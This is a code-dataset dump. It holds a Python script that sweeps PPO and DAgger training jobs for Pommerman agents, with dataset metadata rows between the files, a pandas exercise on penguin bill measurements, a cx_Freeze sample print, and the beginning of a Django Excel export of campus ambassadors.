# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uBnH", "uniformBoundsH"), #100
# ("uBnI", "uniformBoundsI"), #150
# ("genesis", "genesis"),
# ]:
# for numgames in [100]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# if itemreward == 0 and name == "genesis":
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "100bds-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is using the 2nd place agent as the expert. They were there to the end, but received a -1 at the end.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfxusp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, "use-second-place": ""
# }
# counter = 0
# for learning_rate in [1e-4, 3e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnK", "uniformBoundsK"), #40
# ]:
# for numgames in [4]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex-2nd/train" % numgames)
# j["run-name"] = "bsfxusp-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Same as two above with 100 games, but here we use an epoch change of 85.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfx100"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnL", "uniformBoundsL"), #85
# ]:
# for numgames in [100]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "100bds-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Use the rebuilt replays.
# These all previously failed for a reason we never identified.
# Running them again.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uBnL", "uniformBoundsL"), #85
# ("uBnH", "uniformBoundsH"), #100
# ("genesis", "genesis"),
# ]:
# for numgames in [110, 5]:
# if numgames == 5 and name in ["uBnH", "uBnL"]:
# # Skip distributions we know are too slow.
# continue
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# for use_second_place in [True, False]:
# if numgames == 110:
# runng = 100
# elif numgames == 5:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "fx%d-%s-%d" % (runng, name, counter)
# if use_second_place:
# if numgames == 110:
# # Skip because we didn't set up usp for 110
# counter += 1
# continue
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Doing different seeds on the G models...
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# # ("uBnG", "uniformBoundsG"), #50
# ("uniform", "uniform"), #50
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [3, 4, 5]:
# for use_second_place in [True, False]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "2fx%d-%s-%d" % (runng, name, counter)
# if use_second_place:
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Doing different seeds on the 100 L models...
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# # ("uBnL", "uniformBoundsL"), #85
# ("uniform", "uniform"), #85
# ]:
# for numgames in [110]:
# for itemreward in [0, .1]:
# for seed in [3, 4, 5]:
# runng = 100
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "2fx%d-%s-%d" % (runng, name, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# Dagger, the 102400 ones didn't work because we ran out of memory... I'm going to have to restart these to be have more time...
# job = {
# "num-processes": 60, "how-train": "dagger", "num-episodes-dagger": 10, "log-interval": 25,
# "save-interval": 25, "num-steps-eval": 100,
# "log-dir": os.path.join(directory, "dagger", "logs"),
# "save-dir": os.path.join(directory, "dagger", "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall",
# "expert-prob": 0.5,
# }
# counter = 0
# for learning_rate in [3e-3, 1e-3, 3e-4]:
# for minibatch_size in [5120]:
# for maxaggr_size in [102400, 51200]:
# for numgames in [110, 5]:
# for gamma in [.995, 1.]:
# for seed in [1, 2]:
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# run_name = "dagfx%d-%d" % (numgames, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["run-name"] = run_name
# j["seed"] = seed
# j["gamma"] = gamma
# j["minibatch-size"] = minibatch_size
# j["max-aggregate-agent-states"] = maxaggr_size
# j["seed"] = seed
# j["state-directory-distribution"] = "genesis"
# j["lr"] = learning_rate
# train_dagger_job(j, j["run-name"], is_fb=True, partition="uninterrupted")
# counter += 1
### Dagger again.
# job = {
# "num-processes": 60, "how-train": "dagger", "num-episodes-dagger": 10, "log-interval": 75,
# "save-interval": 75, "num-steps-eval": 100,
# "log-dir": os.path.join(directory, "dagger", "logs"),
# "save-dir": os.path.join(directory, "dagger", "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall",
# "expert-prob": 0.5,
# }
# counter = 0
# for learning_rate in [3e-3, 1e-3]:
# for minibatch_size in [5120]:
# for maxaggr_size in [51200]:
# for numgames in [110, 5]:
# for gamma in [.995, 1.]:
# for seed in [3, 4, 5, 6]:
# for item_reward in [0., 0.1]:
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# run_name = "dag2fx%d-%d" % (numgames, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["run-name"] = run_name
# if item_reward:
# j["item-reward"] = item_reward
# j["seed"] = seed
# j["gamma"] = gamma
# j["minibatch-size"] = minibatch_size
# j["max-aggregate-agent-states"] = maxaggr_size
# j["seed"] = seed
# j["state-directory-distribution"] = "genesis"
# j["lr"] = learning_rate
# train_dagger_job(j, j["run-name"], is_fb=True, partition="uninterrupted")
# counter += 1
### Backselfplay First runs.
# These didn't work. Some hypothesis:
# 1. The agents were dumb at the beginning and so they just learned useless policies that didn't translate
# when they then were introduced to complex agents later on.
# 2. The value loss is way off because it's an unstable and changing policy.
# job = {
# "how-train": "backselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uniform", "uniform"),
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubp" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubp" % runng)
# run_name = "bspubp-fx%d-%s-%d" % (runng, name, counter)
# j["use-both-places"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### The above but with already trained policies. Note that we are using a policy that was trained only for the single agent. Will it do ok on the 2nd agent??? Unclear.
### These were misguided because we didn't restart the counts ...
### Start them over with that.
# job = {
# "how-train": "backselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uniform", "uniform"),
# ("genesis", "genesis"),
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [3]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubp" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubp" % runng)
# run_name = "bspubpld-fx%d-%s-%d" % (runng, name, counter)
# j["use-both-places"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-3.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.itemrew0.100.epoch500.steps51210000.pt")
# else:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-0.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.epoch500.steps51210000.pt")
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Here, we use the adaptive policy for frobackselfplay. We haven't done that in a long time so we try out a few different approaches.
# job = {
# "how-train": "frobackselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, "use-both-places": "",
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ("uBnAdptB", "uniformBndAdptB"),
# ("uniform", "uniform"),
# ("genesis", "genesis"),
# ]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# for use_saved_path in [False, True]:
# numgames = 5
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubnadpt" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubnadpt" % runng)
# run_name = "fx%d-%s-%d" % (runng, name, counter)
# j["use-both-places"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# if use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-3.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.itemrew0.100.epoch500.steps51210000.pt")
# elif use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-0.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.epoch500.steps51210000.pt")
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Backplay but with adaptive simple training.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ("uBnAdptB", "uniformBndAdptB"),
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# for use_second_place in [True, False]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d-adpt" % runng)
# run_name = "%s-%d" % (name, counter)
# if use_second_place:
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Like the above re adaptive but we are:
### 1. Busting out the per-agent success rates to be over only those games and not all games.
### 2. Restricting each thread to be roughly only a single game. Two games are overrepresented.
### 3. Also doing mixed frozen+complex half the time.
# job = {
# "how-train": "frobackselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 64, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, "use-both-places": "",
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ("uBnAdptB", "uniformBndAdptB"),
# ("uniform", "uniform"),
# ("genesis", "genesis"),
# ]:
# for itemreward in [0, .1]:
# for seed in [1]:
# for use_saved_path in [False, True]:
# for mix_frozen_complex in [False, True]:
# numgames = 5
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubnadpt" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubnadpt" % runng)
# run_name = "2fx%d-%s-%d" % (runng, name, counter)
# if mix_frozen_complex:
# j["mix-frozen-complex"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# if use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-3.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.itemrew0.100.epoch500.steps51210000.pt")
# elif use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-0.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.epoch500.steps51210000.pt")
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Backplay like above with adaptive simple training, but here we lower the threshold to 0.5 instead of 0.6.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, 'adapt-threshold': .5
# }
# counter = 0
# for learning_rate in [3e-4]:
# for itemreward in [0, .1]:
# for numgames in [5]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ]:
# for seed in [1, 2]:
# for use_second_place in [True, False]:
# for adapt_threshold in [.5, .6]:
# runng = 4
# j = {k:v for k,v in job.items()}
# j["adapt-threshold"] = adapt_threshold
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d-adpt" % runng)
# run_name = "%s-%d" % (name, counter)
# if use_second_place:
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Running everything for 100 over for 5 seeds across uniform, genesis, and uBnL for the ICLR paper.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnL", "uniformBoundsL"), #85
# ("unfm", "uniform"), #85
# ("gnss", "genesis")
# ]:
# for numgames in [110]:
# for itemreward in [0, .1]:
# for seed in [1, 2, 3, 4, 5]:
# runng = 100
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "iclr%d-2fx%d-%s-%d" % (seed, runng, name, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Running everything for 4 over for 5 seeds across uniform, genesis, and uBnG for the ICLR paper.
### Additionally running use_second_place as well.
### There are 3*2*5*2 = 60 jobs here.
# ICLR sweep: 3 state distributions x {0, .1} item reward x 5 seeds x
# use-second-place on/off = 60 PPO "simple" training jobs.
job = {
    "how-train": "simple", "log-interval": 7500, "save-interval": 25,
    "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
    "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
    "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
    "num-frames": 2000000000,
}
counter = 0
for lr in [3e-4]:
    for dist_label, dist in [
            ("uBnG", "uniformBoundsG"),  # 50
            ("unfm", "uniform"),
            ("gnss", "genesis")]:
        for n_games in [5]:
            for item_rew in [0, .1]:
                for seed in [1, 2, 3, 4, 5]:
                    for second_place in (True, False):
                        runng = 4
                        j = dict(job)
                        subdir = "fx-ffacompetition%d-s100-complex-both" % n_games
                        log_dir = os.path.join(directory, "logs-fx%d" % runng)
                        save_dir = os.path.join(directory, "models-fx%d" % runng)
                        run_name = "iclr%d-2fx%d-%s-%d" % (seed, runng, dist_label, counter)
                        if second_place:
                            # Flag-style option: the key's presence is what matters.
                            j["use-second-place"] = ""
                            log_dir += "usp"
                            save_dir += "usp"
                            run_name += "usp"
                        j["state-directory"] = os.path.join(
                            directory,
                            "pomplays",
                            subdir,
                            "train")
                        j["log-dir"] = log_dir
                        j["save-dir"] = save_dir
                        j["run-name"] = run_name
                        if item_rew:
                            j["item-reward"] = item_rew
                        j["seed"] = seed
                        j["state-directory-distribution"] = dist
                        j["lr"] = lr
                        train_ppo_job(j, j["run-name"], is_fb=True)
                        counter += 1
| 50.254882
| 245
| 0.545837
| 16,941
| 146,694
| 4.682545
| 0.049761
| 0.02259
| 0.026725
| 0.048861
| 0.898988
| 0.892949
| 0.888298
| 0.886836
| 0.878894
| 0.874242
| 0
| 0.057471
| 0.268852
| 146,694
| 2,918
| 246
| 50.272104
| 0.682141
| 0.912805
| 0
| 0.343949
| 0
| 0
| 0.187412
| 0.023565
| 0
| 0
| 0
| 0.000343
| 0
| 1
| 0.012739
| false
| 0
| 0.025478
| 0
| 0.038217
| 0.012739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b23ef4e76c8e78b49870d7bb359008a37b2e54d2
| 158
|
py
|
Python
|
Python/Topics/Summarizing numeric columns/Mean penguin/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 5
|
2020-08-29T15:15:31.000Z
|
2022-03-01T18:22:34.000Z
|
Python/Topics/Summarizing numeric columns/Mean penguin/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | null | null | null |
Python/Topics/Summarizing numeric columns/Mean penguin/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 1
|
2020-12-02T11:13:14.000Z
|
2020-12-02T11:13:14.000Z
|
#your code here. The DataFrame is already loaded as penguins_example.
# Ratio of mean bill length to mean bill depth over all rows.
# NOTE(review): assumes `penguins_example` is a pandas DataFrame with numeric
# bill_length_mm / bill_depth_mm columns — supplied by the exercise platform.
print(penguins_example.bill_length_mm.mean() / penguins_example.bill_depth_mm.mean())
| 39.5
| 85
| 0.816456
| 24
| 158
| 5.083333
| 0.708333
| 0.368852
| 0.311475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 158
| 3
| 86
| 52.666667
| 0.853147
| 0.43038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b29bca61993c5a08196105dba4dc72a7cc0cd76d
| 34
|
py
|
Python
|
cx_Freeze/samples/relimport/pkg1/pkg2/sub5.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 358
|
2020-07-02T13:00:02.000Z
|
2022-03-29T10:03:57.000Z
|
cx_Freeze/samples/relimport/pkg1/pkg2/sub5.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 372
|
2020-07-02T20:47:57.000Z
|
2022-03-31T19:35:05.000Z
|
cx_Freeze/samples/relimport/pkg1/pkg2/sub5.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 78
|
2020-07-09T14:24:03.000Z
|
2022-03-22T19:06:52.000Z
|
# Import-time side effect only: announces that this submodule was loaded,
# so relative-import resolution can be traced at runtime.
print("importing pkg1.pkg2.sub5")
| 17
| 33
| 0.764706
| 5
| 34
| 5.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 0.058824
| 34
| 1
| 34
| 34
| 0.71875
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
a2e1e8a7eb38d309de72d001cd94394ea0e9c358
| 9,167
|
py
|
Python
|
pcradmin/excels.py
|
abhi20161997/Apogee-2017
|
e4ae1b379bd5111a3bd7d3399d081dda897a8566
|
[
"BSD-3-Clause"
] | null | null | null |
pcradmin/excels.py
|
abhi20161997/Apogee-2017
|
e4ae1b379bd5111a3bd7d3399d081dda897a8566
|
[
"BSD-3-Clause"
] | null | null | null |
pcradmin/excels.py
|
abhi20161997/Apogee-2017
|
e4ae1b379bd5111a3bd7d3399d081dda897a8566
|
[
"BSD-3-Clause"
] | null | null | null |
from django.http import HttpResponse
from .views import deepgetattr
from portal.models import CampusAmbassador
from registration.models import Participant
from time import gmtime, strftime
import xlsxwriter
# Python 2 compatibility shim: prefer the C-accelerated cStringIO, fall back
# to the pure-Python StringIO module. Neither exists on Python 3 — this file
# targets Python 2 (io.BytesIO would be the py3 equivalent for xlsxwriter).
try:
    import cStringIO as StringIO
except ImportError:
    import StringIO
def ambassador_excel(request, **kwargs):
    """Stream an xlsx listing CampusAmbassador rows (filtered by **kwargs).

    Row 0 holds a generated-at timestamp, row 1 the column headers, and one
    row per ambassador follows, ordered by id. Returns the workbook as an
    'application/ms-excel' attachment named ExcelReport.xlsx.
    """
    entries = CampusAmbassador.objects.filter(**kwargs).order_by('id')
    output = StringIO.StringIO()
    workbook = xlsxwriter.Workbook(output)
    worksheet = workbook.add_worksheet('new-spreadsheet')
    # NOTE(review): date_format is created but never applied to any cell.
    date_format = workbook.add_format({'num_format': 'mmmm d yyyy'})
    worksheet.write(0, 0, "Generated:")
    generated = strftime("%d-%m-%Y %H:%M:%S UTC", gmtime())
    worksheet.write(0, 1, generated)
    # Header row (row index 1).
    worksheet.write(1, 0, "ID")
    worksheet.write(1, 1, "Name")
    worksheet.write(1, 2, "College")
    worksheet.write(1, 3, "Degree")
    worksheet.write(1, 4, "Year")
    worksheet.write(1, 5, "Phone")
